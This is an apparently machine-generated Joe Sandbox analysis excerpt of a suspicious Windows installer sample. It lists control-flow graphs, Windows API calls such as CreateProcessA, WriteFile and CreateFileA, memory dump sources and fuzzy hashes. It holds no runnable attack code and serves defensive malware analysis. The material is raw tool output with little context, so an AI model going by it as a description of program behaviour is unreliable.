4180 6c9ec248-6c9ec258 4132->4180 4133->4180 4181 6c9ebcf1-6c9ebcf6 4133->4181 4163 6c9ec0a3-6c9ec0c3 4134->4163 4164 6c9ebb10-6c9ebb15 4134->4164 4135->4163 4191 6c9ec2a5-6c9ec2aa 4136->4191 4192 6c9ebe35-6c9ebe7e 4136->4192 4184 6c9eb97c-6c9eb981 4137->4184 4185 6c9ebe9d-6c9ebeb7 4137->4185 4138->4097 4165 6c9ebb5e-6c9ebb63 4139->4165 4166 6c9ec0c8-6c9ec0d8 4139->4166 4167 6c9ebbb0-6c9ebbb5 4140->4167 4168 6c9ec111-6c9ec138 4140->4168 4141->4097 4142->4097 4189 6c9eb9cd-6c9eb9d2 4143->4189 4190 6c9ebf29-6c9ebf3e 4143->4190 4229 6c9ebf86-6c9ebfa6 4144->4229 4193 6c9eb9fe-6c9eba03 4145->4193 4194 6c9ebdfd-6c9ebe25 4145->4194 4169 6c9eb828-6c9eb82d 4146->4169 4146->4170 4182 6c9ec262-6c9ec286 4147->4182 4183 6c9ebd21-6c9ebd26 4147->4183 4148->4138 4171 6c9ebc07-6c9ebc0c 4148->4171 4149->4097 4150->4097 4195 6c9eba2f-6c9eba34 4151->4195 4196 6c9ebfd0-6c9ebff0 4151->4196 4172 6c9ec198-6c9ec1c2 call 6ca1a1c0 4152->4172 4173 6c9ebc42-6c9ebc47 4152->4173 4153->4097 4174 6c9eb887-6c9eb88c 4154->4174 4175 6c9eb7c2-6c9eb7d3 4154->4175 4186 6c9ebd4e-6c9ebd53 4155->4186 4187 6c9ec28b-6c9ec29b 4155->4187 4198 6c9ec00f-6c9ec01c 4156->4198 4199 6c9eba96-6c9eba9b 4156->4199 4157->4198 4158->4097 4176 6c9ebc8f-6c9ebc94 4159->4176 4177 6c9ec1fb-6c9ec229 4159->4177 4160->4097 4200 6c9ebad7-6c9ebaf1 4160->4200 4161->4135 4162->4097 4163->4097 4164->4097 4201 6c9ebb1b-6c9ebb43 4164->4201 4165->4097 4202 6c9ebb69-6c9ebb95 4165->4202 4166->4141 4167->4097 4204 6c9ebbbb-6c9ebbec call 6c9e18a0 call 6c9e18b0 4167->4204 4168->4097 4169->4097 4206 6c9eb82f-6c9eb841 4169->4206 4170->4097 4171->4097 4207 6c9ebc12-6c9ebc27 4171->4207 4172->4097 4173->4097 4208 6c9ebc4d-6c9ebc74 4173->4208 4174->4097 4209 6c9eb892-6c9eb89f 4174->4209 4203 6c9eb7d8-6c9eb7dd 4175->4203 4176->4097 4176->4138 4177->4097 4178->4097 4211 6c9eb8e7-6c9eb94a call 6c9ec2c0 CreateFileA 4178->4211 4179->4185 4180->4182 4181->4097 4212 6c9ebcfc-6c9ebd11 4181->4212 4182->4097 4183->4097 4213 6c9ebd2c-6c9ebd39 4183->4213 4184->4097 4214 6c9eb987-6c9eb9a7 4184->4214 4218 6c9eb7e0-6c9eb7e4 4185->4218 4186->4097 4215 6c9ebd59-6c9ebda1 4186->4215 4187->4191 4188->4097 4216 6c9ebdb8-6c9ebdc8 4188->4216 4189->4194 4217 6c9eb9d8 4189->4217 4190->4144 4191->4097 4210 6c9ec2b0-6c9ec2bb 4191->4210 4192->4218 4193->4170 4219 6c9eba09 4193->4219 4194->4097 4195->4097 4220 6c9eba3a-6c9eba70 4195->4220 4196->4097 4198->4128 4199->4097 4222 6c9ebaa1-6c9ebab1 4199->4222 4200->4120 4201->4097 4202->4097 4203->4218 4204->4097 4206->4218 4207->4097 4208->4097 4209->4203 4211->4097 4212->4097 4213->4155 4214->4162 4215->4097 4216->4170 4217->4097 4218->4097 4219->4097 4220->4097 4222->4218 4229->4097
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                          • API String ID: 0-2932700092
                          • Opcode ID: 0cb507c34e1f82c2ec87a3f558951a50071da5bd463fb2fd4ded7bb6bb57ae7d
                          • Instruction ID: de54d89a9d09324b62c6cb3aca65380d3bc27362b0577730004d98f99e42f6b2
                          • Opcode Fuzzy Hash: 0cb507c34e1f82c2ec87a3f558951a50071da5bd463fb2fd4ded7bb6bb57ae7d
                          • Instruction Fuzzy Hash: B552427460C3829FCB16CE69C49062ABBF1AF9A714F248D1EE498C7B50D635D888CB57
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: ;T55
                          • API String ID: 0-2572755013
                          • Opcode ID: 8272f5b392a3c845a676e14db58608ecbfdeaaf2f03b5e11e14d6b16c31aedd6
                          • Instruction ID: b19d2c768a6f32bdfcfae246ea97c33adf4e02824c234e3d76c183d58fd39e84
                          • Opcode Fuzzy Hash: 8272f5b392a3c845a676e14db58608ecbfdeaaf2f03b5e11e14d6b16c31aedd6
                          • Instruction Fuzzy Hash: A203E171645B018FC738CF68C9D0696B7E2AFE53247198F6DC0AA4BA95DB34B44BCB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4627 6ca13e00-6ca13e87 CreateProcessA 4628 6ca13eab-6ca13eb4 4627->4628 4629 6ca13ed0-6ca13f1a WaitForSingleObject CloseHandle * 2 4628->4629 4630 6ca13eb6-6ca13ebb 4628->4630 4629->4628 4631 6ca13e90-6ca13ea3 4630->4631 4632 6ca13ebd-6ca13ec2 4630->4632 4631->4628 4632->4628 4633 6ca13ec4-6ca13f27 4632->4633
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CloseHandle$CreateObjectProcessSingleWait
                          • String ID: D
                          • API String ID: 2059082233-2746444292
                          • Opcode ID: 417113e16124a513b4f245b31e77501a20bdb88197bbde9a57baf410b23af8db
                          • Instruction ID: 0f8f351593b7d1d3d0bc78ca007c829b4eeb5a60b9eae64190acaaf15e82635a
                          • Opcode Fuzzy Hash: 417113e16124a513b4f245b31e77501a20bdb88197bbde9a57baf410b23af8db
                          • Instruction Fuzzy Hash: BB31E2B19093408FD750DF28C19875EBBF0AB8A308F505A1DF9D9976A0E7749584CF43

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4648 6ca2aa7e-6ca2aa9a 4649 6ca2aaa0-6ca2aaa2 4648->4649 4650 6ca2ac59 4648->4650 4651 6ca2aac4-6ca2aae5 4649->4651 4652 6ca2aaa4-6ca2aab7 call 6ca1e7ff call 6ca1e7ec call 6ca1ef40 4649->4652 4653 6ca2ac5b-6ca2ac5f 4650->4653 4655 6ca2aae7-6ca2aaea 4651->4655 4656 6ca2aaec-6ca2aaf2 4651->4656 4670 6ca2aabc-6ca2aabf 4652->4670 4655->4656 4658 6ca2aaf4-6ca2aaf9 4655->4658 4656->4652 4656->4658 4660 6ca2ab0a-6ca2ab1b call 6ca2ac60 4658->4660 4661 6ca2aafb-6ca2ab07 call 6ca29a89 4658->4661 4668 6ca2ab5c-6ca2ab6e 4660->4668 4669 6ca2ab1d-6ca2ab1f 4660->4669 4661->4660 4673 6ca2ab70-6ca2ab79 4668->4673 4674 6ca2abb5-6ca2abd7 WriteFile 4668->4674 4671 6ca2ab21-6ca2ab29 4669->4671 4672 6ca2ab46-6ca2ab52 call 6ca2acd1 4669->4672 4670->4653 4675 6ca2abeb-6ca2abee 4671->4675 4676 6ca2ab2f-6ca2ab3c call 6ca2b07b 4671->4676 4684 6ca2ab57-6ca2ab5a 4672->4684 4680 6ca2aba5-6ca2abb3 call 6ca2b0e3 4673->4680 4681 6ca2ab7b-6ca2ab7e 4673->4681 4678 6ca2abe2 4674->4678 4679 6ca2abd9-6ca2abdf GetLastError 4674->4679 4686 6ca2abf1-6ca2abf6 4675->4686 4692 6ca2ab3f-6ca2ab41 4676->4692 4685 6ca2abe5-6ca2abea 4678->4685 4679->4678 4680->4684 4687 6ca2ab80-6ca2ab83 4681->4687 4688 6ca2ab95-6ca2aba3 call 6ca2b2a7 4681->4688 4684->4692 4685->4675 4693 6ca2ac54-6ca2ac57 4686->4693 4694 6ca2abf8-6ca2abfd 4686->4694 4687->4686 4695 6ca2ab85-6ca2ab93 call 6ca2b1be 4687->4695 4688->4684 4692->4685 4693->4653 4698 6ca2ac29-6ca2ac35 4694->4698 4699 6ca2abff-6ca2ac04 4694->4699 4695->4684 4703 6ca2ac37-6ca2ac3a 4698->4703 4704 6ca2ac3c-6ca2ac4f call 6ca1e7ec call 6ca1e7ff 4698->4704 4700 6ca2ac06-6ca2ac18 call 6ca1e7ec call 6ca1e7ff 4699->4700 4701 6ca2ac1d-6ca2ac24 call 6ca1e812 4699->4701 4700->4670 4701->4670 4703->4650 4703->4704 4704->4670
                          APIs
                            • Part of subcall function 6CA2ACD1: GetConsoleCP.KERNEL32(?,6CA29EF0,?), ref: 6CA2AD19
                          • WriteFile.KERNEL32(?,?,6CA3350C,00000000,00000000,?,00000000,00000000,6CA348D6,00000000,00000000,?,00000000,6CA29EF0,6CA3350C,00000000), ref: 6CA2ABCF
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA3350C,6CA29EF0,00000000,?,?,?,?,00000000,?), ref: 6CA2ABD9
                          • __dosmaperr.LIBCMT ref: 6CA2AC1E
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                          • String ID: 8Q
                          • API String ID: 251514795-4022487301
                          • Opcode ID: fde4523aead302cefddb88f64c484ff9fbf569b346726c4b1cd81f8eb3151aff
                          • Instruction ID: a995c62bf5f5c8cee609762463513bef4b10469bb31256778d8155391acc7939
                          • Opcode Fuzzy Hash: fde4523aead302cefddb88f64c484ff9fbf569b346726c4b1cd81f8eb3151aff
                          • Instruction Fuzzy Hash: 8751C771A04129AFEB01DFA4C984BDEBBBBEF05318F1C0551E510ABA51D7389DC9C7A1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4715 6ca149b0-6ca149bc 4716 6ca149fd 4715->4716 4717 6ca149be-6ca149c9 4715->4717 4720 6ca149ff-6ca14a77 4716->4720 4718 6ca149cb-6ca149dd 4717->4718 4719 6ca149df-6ca149ec call 6c8e01f0 call 6ca1f938 4717->4719 4718->4719 4728 6ca149f1-6ca149fb 4719->4728 4722 6ca14aa3-6ca14aa9 4720->4722 4723 6ca14a79-6ca14aa1 4720->4723 4723->4722 4725 6ca14aaa-6ca14b69 call 6c8e2250 call 6c8e2340 call 6ca18199 call 6c8de010 call 6ca15ea8 4723->4725 4728->4720
                          APIs
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA14B51
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 323602529-1866435925
                          • Opcode ID: 4daf8fe656a2f8d9ab81a231d36f91f05d71580720c55df13c2c2260ee936606
                          • Instruction ID: 6b4d28ee5f675695ca095ddc8dd50bb8a3a09c01263d1c4669d3861e3b050ea5
                          • Opcode Fuzzy Hash: 4daf8fe656a2f8d9ab81a231d36f91f05d71580720c55df13c2c2260ee936606
                          • Instruction Fuzzy Hash: 385133B5900B008FD729CF29C595B97BBF1BB49318F048A2DD8868BF90D775B949CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4738 6c9ec310-6c9ec36c call 6ca15990 4741 6c9ec3c0-6c9ec3c9 4738->4741 4742 6c9ec3cb-6c9ec3d0 4741->4742 4743 6c9ec410-6c9ec415 4741->4743 4744 6c9ec3d6-6c9ec3db 4742->4744 4745 6c9ec460-6c9ec465 4742->4745 4746 6c9ec41b-6c9ec420 4743->4746 4747 6c9ec4f8-6c9ec4fd 4743->4747 4752 6c9ec51d-6c9ec531 WriteFile 4744->4752 4753 6c9ec3e1-6c9ec3e6 4744->4753 4748 6c9ec59c-6c9ec5b4 4745->4748 4749 6c9ec46b-6c9ec470 4745->4749 4754 6c9ec426-6c9ec42b 4746->4754 4755 6c9ec567-6c9ec597 call 6ca1a1c0 4746->4755 4750 6c9ec5e6-6c9ec5fd WriteFile 4747->4750 4751 6c9ec503-6c9ec508 4747->4751 4759 6c9ec5bc-6c9ec5d0 4748->4759 4749->4759 4760 6c9ec476-6c9ec47b 4749->4760 4762 6c9ec607-6c9ec60c 4750->4762 4761 6c9ec50e-6c9ec513 4751->4761 4751->4762 4764 6c9ec53b-6c9ec55f 4752->4764 4763 6c9ec3ec-6c9ec3f1 4753->4763 4753->4764 4756 6c9ec36e-6c9ec3b0 call 6ca1a740 ReadFile 4754->4756 4757 6c9ec431-6c9ec436 4754->4757 4755->4741 4773 6c9ec3b3-6c9ec3b8 4756->4773 4757->4741 4765 6c9ec438-6c9ec452 4757->4765 4768 6c9ec5d4-6c9ec5e1 4759->4768 4760->4741 4769 6c9ec481-6c9ec4ee WriteFile 4760->4769 4761->4752 4762->4741 4770 6c9ec612-6c9ec620 4762->4770 4763->4741 4771 6c9ec3f3-6c9ec406 4763->4771 4764->4755 4765->4768 4768->4741 4769->4747 4771->4773 4773->4741
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 363486ce8dc00c4ff8b46265c78e2189b8ae2eb7ff9f77791ea1df2392805670
                          • Instruction ID: 1b70abf49470caba8bf1bcec82b4e60786ccacc478f26ef6c14befd3e0770282
                          • Opcode Fuzzy Hash: 363486ce8dc00c4ff8b46265c78e2189b8ae2eb7ff9f77791ea1df2392805670
                          • Instruction Fuzzy Hash: 517168B0208305AFD701DF18C480B9FBBE8BF99714F50592EF5E9C6A50D775D8988B92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4796 6ca2a745-6ca2a759 call 6ca303c2 4799 6ca2a75b-6ca2a75d 4796->4799 4800 6ca2a75f-6ca2a767 4796->4800 4801 6ca2a7ad-6ca2a7cd call 6ca3053f 4799->4801 4802 6ca2a772-6ca2a775 4800->4802 4803 6ca2a769-6ca2a770 4800->4803 4811 6ca2a7db 4801->4811 4812 6ca2a7cf-6ca2a7d9 call 6ca1e812 4801->4812 4806 6ca2a793-6ca2a7a3 call 6ca303c2 CloseHandle 4802->4806 4807 6ca2a777-6ca2a77b 4802->4807 4803->4802 4805 6ca2a77d-6ca2a791 call 6ca303c2 * 2 4803->4805 4805->4799 4805->4806 4806->4799 4818 6ca2a7a5-6ca2a7ab GetLastError 4806->4818 4807->4805 4807->4806 4816 6ca2a7dd-6ca2a7e0 4811->4816 4812->4816 4818->4801
                          APIs
                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA3307F), ref: 6CA2A79B
                          • GetLastError.KERNEL32(?,00000000,?,6CA3307F), ref: 6CA2A7A5
                          • __dosmaperr.LIBCMT ref: 6CA2A7D0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CloseErrorHandleLast__dosmaperr
                          • String ID:
                          • API String ID: 2583163307-0
                          • Opcode ID: 13ab672725871e31031d216d5f14a7823350c77f8f5bbeadb49320e0c8e94b76
                          • Instruction ID: 73d2ddc2bcfdc226862ee8eb865de46d0180015508052e350223f2468efaeed0
                          • Opcode Fuzzy Hash: 13ab672725871e31031d216d5f14a7823350c77f8f5bbeadb49320e0c8e94b76
                          • Instruction Fuzzy Hash: 8B0148327092701BC305563899847AD67764BC373CF2D8359E958CBEC2DF288CC95294
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8Q
                          • API String ID: 0-4022487301
                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                          • Instruction ID: ca340ee3964242e506c121e3ff279eb20985ea753d539feebba32160afea963d
                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                          • Instruction Fuzzy Hash: 8DF0D13250A6681AD7211A7DCE00BCA32E98F4233CF280719E82593EC0CB38D58E86A1
                          APIs
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA148D4
                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA14914
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Ios_base_dtorstd::ios_base::_
                          • String ID:
                          • API String ID: 323602529-0
                          • Opcode ID: 9d1cdc8734747235ecaf6f1f9bac52c3d23a66a927a6ef6774410bf1463a7ab4
                          • Instruction ID: 7b3e1abdbf911b12eb8d820ade90dac90e54709f59f58685946500640334603f
                          • Opcode Fuzzy Hash: 9d1cdc8734747235ecaf6f1f9bac52c3d23a66a927a6ef6774410bf1463a7ab4
                          • Instruction Fuzzy Hash: 06515871505B40DBE725CF29C995BD2BBF4BB04718F448A1CD4AA8BB91DB30F989CB80
                          APIs
                          • GetLastError.KERNEL32(6CA44DD8,0000000C), ref: 6CA1DD72
                          • ExitThread.KERNEL32 ref: 6CA1DD79
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorExitLastThread
                          • String ID:
                          • API String ID: 1611280651-0
                          • Opcode ID: b3774f260301a9213cdea0cd5fbf687246edd05bab43dc9de5b78ab5bf37fe39
                          • Instruction ID: e7fe67ea74b2afa9dd82354402275c063a9d9de19c2988e6cb641b52dd2f51a3
                          • Opcode Fuzzy Hash: b3774f260301a9213cdea0cd5fbf687246edd05bab43dc9de5b78ab5bf37fe39
                          • Instruction Fuzzy Hash: A2F0C2B1A14615AFDB05AFB0C50CAAE3B74FF41218F188689E002D7F40CB35598ACB60
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __wsopen_s
                          • String ID:
                          • API String ID: 3347428461-0
                          • Opcode ID: c7685b759b0f2b14c23f2522d113ccae23299c7094196e9f119574927c90a7b6
                          • Instruction ID: 32879a744f8e3f295c2e007dec9056bc4917024ee41f733b798f31f14c4317ea
                          • Opcode Fuzzy Hash: c7685b759b0f2b14c23f2522d113ccae23299c7094196e9f119574927c90a7b6
                          • Instruction Fuzzy Hash: 55116A71A0420AAFCF09CF58EA4499F3BF8EF48308F084059F808EB301D634E915CBA8
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                          • Instruction ID: 79b5b636a6c1575e4bffdb7c18c4abc9e60cb9cd521903b61e847e1a5d743716
                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
